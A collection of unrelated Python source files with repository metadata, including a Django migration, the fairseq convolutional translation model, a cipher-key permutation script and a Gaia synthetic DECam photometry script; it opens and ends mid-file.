profiler = Profiler()
try:
profiler.connect(host, port)
except:
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
traceback.print_exc()
sys.exit(1)
# add file path to sys.path
sys.path.insert(0, os.path.split(file)[0])
profiler.run(file)
| [
"[email protected]"
] | |
e54de02e976647aa74f068b06084f0e6aa09524f | 0e60ed9251cd6e2ccc9645c45783a53fdabc22aa | /backend/home/migrations/0003_auto_20200613_0652.py | 3f900f39b9ebe293952dd7350fd52cfd4ad1297b | [] | no_license | crowdbotics-apps/mobile-13-dev-5964 | 7b522691afd94b4e7662ba5244abb1a8ab6768a3 | dee9594b7a96748c4c729d77145a01c592339e01 | refs/heads/master | 2022-10-22T08:47:30.634185 | 2020-06-13T07:29:34 | 2020-06-13T07:29:34 | 271,942,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # Generated by Django 2.2.13 on 2020-06-13 06:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("home", "0002_load_initial_data"),
]
operations = [
migrations.AddField(
model_name="customtext",
name="caasdc",
field=models.ManyToManyField(
blank=True, related_name="customtext_caasdc", to="home.HomePage"
),
),
migrations.AddField(
model_name="customtext",
name="sacscs",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="customtext_sacscs",
to=settings.AUTH_USER_MODEL,
),
),
]
| [
"[email protected]"
] | |
a72bf1e2b39f2476cd8b658a62118d236cf164a7 | 4f026ddcf8f058d884f15259f0e42c2178eb2157 | /roomlistwatcher/common/messaging/filters.py | 787b395ad5017aa059aacbf980e915a82a2ffff0 | [
"MIT"
] | permissive | dnguyen0304/roomlistwatcher | afd95e5f601f77fc8d7c4cd4307e60f36b53162c | 7ac4d5172de22dd8906662da521995c8e06c2617 | refs/heads/master | 2021-01-20T22:55:04.289589 | 2017-11-16T04:09:49 | 2017-11-16T04:09:49 | 101,829,306 | 0 | 0 | null | 2017-11-16T04:09:49 | 2017-08-30T02:38:56 | Python | UTF-8 | Python | false | false | 382 | py | # -*- coding: utf-8 -*-
import abc
class StringFilter(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def filter(self, string):
"""
Parameters
----------
string : str
Returns
-------
str
If the data should not be filtered. Otherwise None.
"""
raise NotImplementedError
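# --- Illustrative sketch (added commentary; the class below is hypothetical) ---
# A concrete StringFilter only needs to implement filter(), e.g.:
#
#     class KeywordStringFilter(StringFilter):
#
#         def __init__(self, keyword):
#             self.keyword = keyword
#
#         def filter(self, string):
#             # Drop any string containing the keyword.
#             return string if self.keyword not in string else None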
| [
"[email protected]"
] | |
b23f2e5fe1e974e3f9b11f5b20f431a35ee516d3 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/nlp/FairSeq_Transformer_ID0496_for_PyTorch/fairseq/models/fconv.py | 3d524589bb9294a89f9681571921b19673ccb18c | [
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 29,338 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
AdaptiveSoftmax, BeamableMM, GradMultiply, LearnedPositionalEmbedding,
LinearizedConvolution,
)
@register_model('fconv')
class FConvModel(FairseqEncoderDecoderModel):
"""
A fully convolutional model, i.e. a convolutional encoder and a
convolutional decoder, as described in `"Convolutional Sequence to Sequence
Learning" (Gehring et al., 2017) <https://arxiv.org/abs/1705.03122>`_.
Args:
encoder (FConvEncoder): the encoder
decoder (FConvDecoder): the decoder
The Convolutional model provides the following named architectures and
command-line arguments:
.. argparse::
:ref: fairseq.models.fconv_parser
:prog:
"""
@classmethod
def hub_models(cls):
def moses_subword(path):
return {
'path': path,
'tokenizer': 'moses',
'bpe': 'subword_nmt',
}
return {
'conv.wmt14.en-fr': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt14.v2.en-fr.fconv-py.tar.bz2'),
'conv.wmt14.en-de': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt14.en-de.fconv-py.tar.bz2'),
'conv.wmt17.en-de': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt17.v2.en-de.fconv-py.tar.bz2'),
}
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
self.encoder.num_attention_layers = sum(layer is not None for layer in decoder.attention)
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
# fmt: off
parser.add_argument('--dropout', type=float, metavar='D',
help='dropout probability')
parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
help='encoder embedding dimension')
parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
help='path to pre-trained encoder embedding')
parser.add_argument('--encoder-layers', type=str, metavar='EXPR',
help='encoder layers [(dim, kernel_size), ...]')
parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
help='decoder embedding dimension')
parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
help='path to pre-trained decoder embedding')
parser.add_argument('--decoder-layers', type=str, metavar='EXPR',
help='decoder layers [(dim, kernel_size), ...]')
parser.add_argument('--decoder-out-embed-dim', type=int, metavar='N',
help='decoder output embedding dimension')
parser.add_argument('--decoder-attention', type=str, metavar='EXPR',
help='decoder attention [True, ...]')
parser.add_argument('--share-input-output-embed', action='store_true',
help='share input and output embeddings (requires'
' --decoder-out-embed-dim and --decoder-embed-dim'
' to be equal)')
# fmt: on
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure that all args are properly defaulted (in case there are any new ones)
base_architecture(args)
encoder_embed_dict = None
if args.encoder_embed_path:
encoder_embed_dict = utils.parse_embedding(args.encoder_embed_path)
utils.print_embed_overlap(encoder_embed_dict, task.source_dictionary)
decoder_embed_dict = None
if args.decoder_embed_path:
decoder_embed_dict = utils.parse_embedding(args.decoder_embed_path)
utils.print_embed_overlap(decoder_embed_dict, task.target_dictionary)
encoder = FConvEncoder(
dictionary=task.source_dictionary,
embed_dim=args.encoder_embed_dim,
embed_dict=encoder_embed_dict,
convolutions=eval(args.encoder_layers),
dropout=args.dropout,
max_positions=args.max_source_positions,
)
decoder = FConvDecoder(
dictionary=task.target_dictionary,
embed_dim=args.decoder_embed_dim,
embed_dict=decoder_embed_dict,
convolutions=eval(args.decoder_layers),
out_embed_dim=args.decoder_out_embed_dim,
attention=eval(args.decoder_attention),
dropout=args.dropout,
max_positions=args.max_target_positions,
share_embed=args.share_input_output_embed,
)
return FConvModel(encoder, decoder)
class FConvEncoder(FairseqEncoder):
"""
Convolutional encoder consisting of `len(convolutions)` layers.
Args:
dictionary (~fairseq.data.Dictionary): encoding dictionary
embed_dim (int, optional): embedding dimension
embed_dict (str, optional): filename from which to load pre-trained
embeddings
max_positions (int, optional): maximum supported input sequence length
convolutions (list, optional): the convolutional layer structure. Each
list item `i` corresponds to convolutional layer `i`. Layers are
given as ``(out_channels, kernel_width, [residual])``. Residual
connections are added between layers when ``residual=1`` (which is
the default behavior).
dropout (float, optional): dropout to be applied before each conv layer
"""
def __init__(
self, dictionary, embed_dim=512, embed_dict=None, max_positions=1024,
convolutions=((512, 3),) * 20, dropout=0.1,
):
super().__init__(dictionary)
self.dropout = dropout
self.num_attention_layers = None
num_embeddings = len(dictionary)
self.padding_idx = dictionary.pad()
self.embed_tokens = Embedding(num_embeddings, embed_dim, self.padding_idx)
if embed_dict:
self.embed_tokens = utils.load_embedding(embed_dict, self.dictionary, self.embed_tokens)
self.embed_positions = PositionalEmbedding(
max_positions,
embed_dim,
self.padding_idx,
)
convolutions = extend_conv_spec(convolutions)
in_channels = convolutions[0][0]
self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)
self.projections = nn.ModuleList()
self.convolutions = nn.ModuleList()
self.residuals = []
layer_in_channels = [in_channels]
for _, (out_channels, kernel_size, residual) in enumerate(convolutions):
if residual == 0:
residual_dim = out_channels
else:
residual_dim = layer_in_channels[-residual]
self.projections.append(Linear(residual_dim, out_channels)
if residual_dim != out_channels else None)
if kernel_size % 2 == 1:
padding = kernel_size // 2
else:
padding = 0
self.convolutions.append(
ConvTBC(in_channels, out_channels * 2, kernel_size,
dropout=dropout, padding=padding)
)
self.residuals.append(residual)
in_channels = out_channels
layer_in_channels.append(out_channels)
self.fc2 = Linear(in_channels, embed_dim)
def forward(self, src_tokens, src_lengths):
"""
Args:
src_tokens (LongTensor): tokens in the source language of shape
`(batch, src_len)`
src_lengths (LongTensor): lengths of each source sentence of shape
`(batch)`
Returns:
dict:
- **encoder_out** (tuple): a tuple with two elements, where the
first element is the last encoder layer's output and the
second element is the same quantity summed with the input
embedding (used for attention). The shape of both tensors is
`(batch, src_len, embed_dim)`.
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_tokens(src_tokens) + self.embed_positions(src_tokens)
x = F.dropout(x, p=self.dropout, training=self.training)
input_embedding = x
# project to size of convolution
x = self.fc1(x)
# used to mask padding in input
encoder_padding_mask = src_tokens.eq(self.padding_idx).t() # -> T x B
if not encoder_padding_mask.any():
encoder_padding_mask = None
# B x T x C -> T x B x C
x = x.transpose(0, 1)
residuals = [x]
# temporal convolutions
for proj, conv, res_layer in zip(self.projections, self.convolutions, self.residuals):
if res_layer > 0:
residual = residuals[-res_layer]
residual = residual if proj is None else proj(residual)
else:
residual = None
if encoder_padding_mask is not None:
x = x.masked_fill(encoder_padding_mask.unsqueeze(-1), 0)
x = F.dropout(x, p=self.dropout, training=self.training)
if conv.kernel_size[0] % 2 == 1:
# padding is implicit in the conv
x = conv(x)
else:
padding_l = (conv.kernel_size[0] - 1) // 2
padding_r = conv.kernel_size[0] // 2
x = F.pad(x, (0, 0, 0, 0, padding_l, padding_r))
x = conv(x)
x = F.glu(x, dim=2)
if residual is not None:
x = (x + residual) * math.sqrt(0.5)
residuals.append(x)
# T x B x C -> B x T x C
x = x.transpose(1, 0)
# project back to size of embedding
x = self.fc2(x)
if encoder_padding_mask is not None:
encoder_padding_mask = encoder_padding_mask.t() # -> B x T
x = x.masked_fill(encoder_padding_mask.unsqueeze(-1), 0)
# scale gradients (this only affects backward, not forward)
x = GradMultiply.apply(x, 1.0 / (2.0 * self.num_attention_layers))
# add output to input embedding for attention
y = (x + input_embedding) * math.sqrt(0.5)
return {
'encoder_out': (x, y),
'encoder_padding_mask': encoder_padding_mask, # B x T
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out['encoder_out'] is not None:
encoder_out['encoder_out'] = (
encoder_out['encoder_out'][0].index_select(0, new_order),
encoder_out['encoder_out'][1].index_select(0, new_order),
)
if encoder_out['encoder_padding_mask'] is not None:
encoder_out['encoder_padding_mask'] = \
encoder_out['encoder_padding_mask'].index_select(0, new_order)
return encoder_out
def max_positions(self):
"""Maximum input length supported by the encoder."""
return self.embed_positions.max_positions()
class AttentionLayer(nn.Module):
def __init__(self, conv_channels, embed_dim, bmm=None):
super().__init__()
# projects from output of convolution to embedding dimension
self.in_projection = Linear(conv_channels, embed_dim)
# projects from embedding dimension to convolution size
self.out_projection = Linear(embed_dim, conv_channels)
self.bmm = bmm if bmm is not None else torch.bmm
def forward(self, x, target_embedding, encoder_out, encoder_padding_mask):
residual = x
# attention
x = (self.in_projection(x) + target_embedding) * math.sqrt(0.5)
x = self.bmm(x, encoder_out[0])
# don't attend over padding
if encoder_padding_mask is not None:
x = x.float().masked_fill(
encoder_padding_mask.unsqueeze(1),
float('-inf')
).type_as(x) # FP16 support: cast to float and back
# softmax over last dim
sz = x.size()
x = F.softmax(x.view(sz[0] * sz[1], sz[2]), dim=1)
x = x.view(sz)
attn_scores = x
x = self.bmm(x, encoder_out[1])
# scale attention output (respecting potentially different lengths)
s = encoder_out[1].size(1)
if encoder_padding_mask is None:
x = x * (s * math.sqrt(1.0 / s))
else:
s = s - encoder_padding_mask.type_as(x).sum(dim=1, keepdim=True) # exclude padding
s = s.unsqueeze(-1)
x = x * (s * s.rsqrt())
# project back
x = (self.out_projection(x) + residual) * math.sqrt(0.5)
return x, attn_scores
def make_generation_fast_(self, beamable_mm_beam_size=None, **kwargs):
"""Replace torch.bmm with BeamableMM."""
if beamable_mm_beam_size is not None:
del self.bmm
self.add_module('bmm', BeamableMM(beamable_mm_beam_size))
class FConvDecoder(FairseqIncrementalDecoder):
"""Convolutional decoder"""
def __init__(
self, dictionary, embed_dim=512, embed_dict=None, out_embed_dim=256,
max_positions=1024, convolutions=((512, 3),) * 20, attention=True,
dropout=0.1, share_embed=False, positional_embeddings=True,
adaptive_softmax_cutoff=None, adaptive_softmax_dropout=0,
):
super().__init__(dictionary)
self.register_buffer('version', torch.Tensor([2]))
self.dropout = dropout
self.need_attn = True
convolutions = extend_conv_spec(convolutions)
in_channels = convolutions[0][0]
if isinstance(attention, bool):
# expand True into [True, True, ...] and do the same with False
attention = [attention] * len(convolutions)
if not isinstance(attention, list) or len(attention) != len(convolutions):
raise ValueError('Attention is expected to be a list of booleans of '
'length equal to the number of layers.')
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
self.embed_tokens = Embedding(num_embeddings, embed_dim, padding_idx)
if embed_dict:
self.embed_tokens = utils.load_embedding(embed_dict, self.dictionary, self.embed_tokens)
self.embed_positions = PositionalEmbedding(
max_positions,
embed_dim,
padding_idx,
) if positional_embeddings else None
self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)
self.projections = nn.ModuleList()
self.convolutions = nn.ModuleList()
self.attention = nn.ModuleList()
self.residuals = []
layer_in_channels = [in_channels]
for i, (out_channels, kernel_size, residual) in enumerate(convolutions):
if residual == 0:
residual_dim = out_channels
else:
residual_dim = layer_in_channels[-residual]
self.projections.append(Linear(residual_dim, out_channels)
if residual_dim != out_channels else None)
self.convolutions.append(
LinearizedConv1d(in_channels, out_channels * 2, kernel_size,
padding=(kernel_size - 1), dropout=dropout)
)
self.attention.append(AttentionLayer(out_channels, embed_dim)
if attention[i] else None)
self.residuals.append(residual)
in_channels = out_channels
layer_in_channels.append(out_channels)
self.adaptive_softmax = None
self.fc2 = self.fc3 = None
if adaptive_softmax_cutoff is not None:
assert not share_embed
self.adaptive_softmax = AdaptiveSoftmax(num_embeddings, in_channels, adaptive_softmax_cutoff,
dropout=adaptive_softmax_dropout)
else:
self.fc2 = Linear(in_channels, out_embed_dim)
if share_embed:
assert out_embed_dim == embed_dim, \
"Shared embed weights implies same dimensions " \
" out_embed_dim={} vs embed_dim={}".format(out_embed_dim, embed_dim)
self.fc3 = nn.Linear(out_embed_dim, num_embeddings)
self.fc3.weight = self.embed_tokens.weight
else:
self.fc3 = Linear(out_embed_dim, num_embeddings, dropout=dropout)
def forward(self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused):
if encoder_out is not None:
encoder_padding_mask = encoder_out['encoder_padding_mask']
encoder_out = encoder_out['encoder_out']
# split and transpose encoder outputs
encoder_a, encoder_b = self._split_encoder_out(encoder_out, incremental_state)
if self.embed_positions is not None:
pos_embed = self.embed_positions(prev_output_tokens, incremental_state)
else:
pos_embed = 0
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
x = self._embed_tokens(prev_output_tokens, incremental_state)
# embed tokens and combine with positional embeddings
x += pos_embed
x = F.dropout(x, p=self.dropout, training=self.training)
target_embedding = x
# project to size of convolution
x = self.fc1(x)
# B x T x C -> T x B x C
x = self._transpose_if_training(x, incremental_state)
# temporal convolutions
avg_attn_scores = None
num_attn_layers = len(self.attention)
residuals = [x]
for proj, conv, attention, res_layer in zip(self.projections, self.convolutions, self.attention,
self.residuals):
if res_layer > 0:
residual = residuals[-res_layer]
residual = residual if proj is None else proj(residual)
else:
residual = None
x = F.dropout(x, p=self.dropout, training=self.training)
x = conv(x, incremental_state)
x = F.glu(x, dim=2)
# attention
if attention is not None:
x = self._transpose_if_training(x, incremental_state)
x, attn_scores = attention(x, target_embedding, (encoder_a, encoder_b), encoder_padding_mask)
if not self.training and self.need_attn:
attn_scores = attn_scores / num_attn_layers
if avg_attn_scores is None:
avg_attn_scores = attn_scores
else:
avg_attn_scores.add_(attn_scores)
x = self._transpose_if_training(x, incremental_state)
# residual
if residual is not None:
x = (x + residual) * math.sqrt(0.5)
residuals.append(x)
# T x B x C -> B x T x C
x = self._transpose_if_training(x, incremental_state)
# project back to size of vocabulary if not using adaptive softmax
if self.fc2 is not None and self.fc3 is not None:
x = self.fc2(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.fc3(x)
return x, avg_attn_scores
def reorder_incremental_state(self, incremental_state, new_order):
super().reorder_incremental_state(incremental_state, new_order)
encoder_out = utils.get_incremental_state(self, incremental_state, 'encoder_out')
if encoder_out is not None:
encoder_out = tuple(eo.index_select(0, new_order) for eo in encoder_out)
utils.set_incremental_state(self, incremental_state, 'encoder_out', encoder_out)
def max_positions(self):
"""Maximum output length supported by the decoder."""
return self.embed_positions.max_positions() if self.embed_positions is not None else float('inf')
def upgrade_state_dict(self, state_dict):
if utils.item(state_dict.get('decoder.version', torch.Tensor([1]))[0]) < 2:
# old models use incorrect weight norm dimension
for i, conv in enumerate(self.convolutions):
# reconfigure weight norm
nn.utils.remove_weight_norm(conv)
self.convolutions[i] = nn.utils.weight_norm(conv, dim=0)
state_dict['decoder.version'] = torch.Tensor([1])
return state_dict
def make_generation_fast_(self, need_attn=False, **kwargs):
self.need_attn = need_attn
def _embed_tokens(self, tokens, incremental_state):
if incremental_state is not None:
# keep only the last token for incremental forward pass
tokens = tokens[:, -1:]
return self.embed_tokens(tokens)
def _split_encoder_out(self, encoder_out, incremental_state):
"""Split and transpose encoder outputs.
This is cached when doing incremental inference.
"""
cached_result = utils.get_incremental_state(self, incremental_state, 'encoder_out')
if cached_result is not None:
return cached_result
# transpose only once to speed up attention layers
encoder_a, encoder_b = encoder_out
encoder_a = encoder_a.transpose(1, 2).contiguous()
result = (encoder_a, encoder_b)
if incremental_state is not None:
utils.set_incremental_state(self, incremental_state, 'encoder_out', result)
return result
def _transpose_if_training(self, x, incremental_state):
if incremental_state is None:
x = x.transpose(0, 1)
return x
def extend_conv_spec(convolutions):
"""
Extends convolutional spec that is a list of tuples of 2 or 3 parameters
(kernel size, dim size and optionally how many layers behind to look for residual)
to default the residual propagation param if it is not specified
"""
extended = []
for spec in convolutions:
if len(spec) == 3:
extended.append(spec)
elif len(spec) == 2:
extended.append(spec + (1,))
else:
raise Exception('invalid number of parameters in convolution spec ' + str(spec) + '. expected 2 or 3')
return tuple(extended)
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, 0, 0.1)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def PositionalEmbedding(num_embeddings, embedding_dim, padding_idx):
m = LearnedPositionalEmbedding(num_embeddings, embedding_dim, padding_idx)
nn.init.normal_(m.weight, 0, 0.1)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, dropout=0):
"""Weight-normalized Linear layer (input: N x T x C)"""
m = nn.Linear(in_features, out_features)
nn.init.normal_(m.weight, mean=0, std=math.sqrt((1 - dropout) / in_features))
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m)
def LinearizedConv1d(in_channels, out_channels, kernel_size, dropout=0, **kwargs):
"""Weight-normalized Conv1d layer optimized for decoding"""
m = LinearizedConvolution(in_channels, out_channels, kernel_size, **kwargs)
std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))
nn.init.normal_(m.weight, mean=0, std=std)
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m, dim=2)
def ConvTBC(in_channels, out_channels, kernel_size, dropout=0, **kwargs):
"""Weight-normalized Conv1d layer"""
from fairseq.modules import ConvTBC
m = ConvTBC(in_channels, out_channels, kernel_size, **kwargs)
std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))
nn.init.normal_(m.weight, mean=0, std=std)
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m, dim=2)
@register_model_architecture('fconv', 'fconv')
def base_architecture(args):
args.dropout = getattr(args, 'dropout', 0.1)
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 512)
args.encoder_embed_path = getattr(args, 'encoder_embed_path', None)
args.encoder_layers = getattr(args, 'encoder_layers', '[(512, 3)] * 20')
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 512)
args.decoder_embed_path = getattr(args, 'decoder_embed_path', None)
args.decoder_layers = getattr(args, 'decoder_layers', '[(512, 3)] * 20')
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 256)
args.decoder_attention = getattr(args, 'decoder_attention', 'True')
args.share_input_output_embed = getattr(args, 'share_input_output_embed', False)
@register_model_architecture('fconv', 'fconv_iwslt_de_en')
def fconv_iwslt_de_en(args):
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 256)
args.encoder_layers = getattr(args, 'encoder_layers', '[(256, 3)] * 4')
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 256)
args.decoder_layers = getattr(args, 'decoder_layers', '[(256, 3)] * 3')
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 256)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_ro')
def fconv_wmt_en_ro(args):
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_de')
def fconv_wmt_en_de(args):
convs = '[(512, 3)] * 9' # first 9 layers have 512 units
convs += ' + [(1024, 3)] * 4' # next 4 layers have 1024 units
convs += ' + [(2048, 1)] * 2' # final 2 layers use 1x1 convolutions
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 768)
args.encoder_layers = getattr(args, 'encoder_layers', convs)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 768)
args.decoder_layers = getattr(args, 'decoder_layers', convs)
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_fr')
def fconv_wmt_en_fr(args):
convs = '[(512, 3)] * 6' # first 6 layers have 512 units
convs += ' + [(768, 3)] * 4' # next 4 layers have 768 units
convs += ' + [(1024, 3)] * 3' # next 3 layers have 1024 units
convs += ' + [(2048, 1)] * 1' # next 1 layer uses 1x1 convolutions
convs += ' + [(4096, 1)] * 1' # final 1 layer uses 1x1 convolutions
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 768)
args.encoder_layers = getattr(args, 'encoder_layers', convs)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 768)
args.decoder_layers = getattr(args, 'decoder_layers', convs)
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
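# --- Added note (not part of the original fairseq file) ---
# The encoder/decoder layer arguments are Python expressions evaluated with eval(),
# where each tuple is (out_channels, kernel_size[, residual]); extend_conv_spec()
# fills in the default residual distance of 1. For example:
#
#     extend_conv_spec(((512, 3),) * 2 + ((1024, 3, 0),))
#     # -> ((512, 3, 1), (512, 3, 1), (1024, 3, 0))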
| [
"[email protected]"
] | |
76950567499f25a761480d17cfaa528a71dd1eda | 522f4b1b18416443062ec53157340fb2d6f43b1b | /ch4/automate_possible_keys.py | 028d5a70faf14dc5253f9c385bc41c6c444e2c5d | [] | no_license | thewchan/impractical_python | fd3f3d82c6f45d1fd0dea55611bc8d5369c8982c | 9963df374b7de5b3eb1faa58e45de7857c3fc792 | refs/heads/master | 2021-05-22T00:41:05.491349 | 2020-04-04T02:18:16 | 2020-04-04T02:18:16 | 252,884,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | """
Pseudo-code
ask for length of key
initiate possible integers
get sum of positive integers
get negative integers
merge into 1 string
get permutation
loop through permutation and sum up abs values
eliminate those with sum not equal to sum of positive integers
print out list of tuples
"""
from itertools import permutations
while True:
key_len = input("Enter length of key: ")
try:
key_len = int(key_len)
except ValueError:
print("Please enter a number.")
continue
break
positive_integers = list(range(key_len + 1))
positive_integers.pop(0)
print(
"Possible key values (not including direction): ",
*positive_integers,
)
negative_integers = [-1 * x for x in positive_integers]
all_integers = positive_integers + negative_integers
raw_perms = list(permutations(all_integers, key_len))
filtered_perms = []
for perm in raw_perms:
abs_perm = [abs(x) for x in perm]
set_perm = set(abs_perm)
if len(set_perm) == len(perm):
filtered_perms.append(perm)
print("Valid key combinations:\n", *filtered_perms, sep='\n')
print(f"Number of valid key combinations: {len(filtered_perms)}")
| [
"[email protected]"
] | |
a5846c31c6b2366554d3e964fe1fab8ed55f1bb7 | f228b0cbe141d23ad918f9fe7a40674ca8d7c963 | /First_project.py | c59b3f5d3eea312d6cae46c1d93c796c070a73e0 | [] | no_license | Vazimax/My_first_project | a990996e753a979f8bc0393ce97837be55e84418 | 36b8c61a9e05ed9b35b5364521f79c906036415d | refs/heads/main | 2023-01-23T06:04:43.082815 | 2020-11-24T18:47:02 | 2020-11-24T18:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | def odd_even_project() :
number = input("Enter a number :")
while number != "x":
try:
number = int(number)
if number%2 == 0 :
print("It's an even number =)")
else :
print("It's an odd number :)")
except ValueError:
print("Please Enter a valid number")
number = input("Enter a number again , and if you wanna exit press 'x' :") | [
"[email protected]"
] | |
416028c8780dd01160c0b6dd3d29eb7302eda7ca | 3b5ee9aa584bfca56dabc19d75717f6104c0dc95 | /gaia/compute_synthetic_decam_fluxes.py | c4888f1d885e08e3fbaada340ff8434fa33f40ce | [] | no_license | rongpu/desi-misc | 95690ca99962940fd4a793d523edf4d2ce68b4c3 | c700344ebf8f74391fcce69a47e4ca57fc4b34f8 | refs/heads/master | 2023-09-01T00:49:07.399914 | 2023-08-11T17:10:40 | 2023-08-11T17:10:40 | 173,173,912 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,939 | py | # Convert the files from .csv.gz to .fits
from __future__ import division, print_function
import sys, os, glob, time, warnings, gc
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, vstack, hstack, join
import fitsio
from multiprocessing import Pool
from gaiaxpy import generate, PhotometricSystem
output_dir = '/global/cfs/cdirs/desi/users/rongpu/data/gaia_dr3/xp_synthetic_decam_photometry'
fns = sorted(glob.glob('/pscratch/sd/r/rongpu/gaia_dr3/xp_continuous_mean_spectrum/XpContinuousMeanSpectrum_*.fits'))
print(len(fns))
def do_something(fn):
output_fn = os.path.join(output_dir, os.path.basename(fn).replace('XpContinuousMeanSpectrum_', 'XpSyntheticDECam_'))
if os.path.isfile(output_fn):
print(output_fn, 'already exists!')
return None
cat = Table(fitsio.read(fn))
# Workaround to make the multidimensional arrays pandas-compatible
cat = vstack([cat, cat[:1].copy()])
for col in ['bp_coefficients', 'bp_coefficient_errors', 'bp_coefficient_correlations', 'rp_coefficients', 'rp_coefficient_errors', 'rp_coefficient_correlations']:
tmp = list(np.array(cat[col]))
tmp.pop()
tmp += [np.array([0])]
cat[col] = tmp
cat = cat[:-1]
print(len(cat))
cat = cat.to_pandas()
phot_system = PhotometricSystem.DECam
photom = generate(cat, photometric_system=phot_system, save_file=False)
photom = Table.from_pandas(photom)
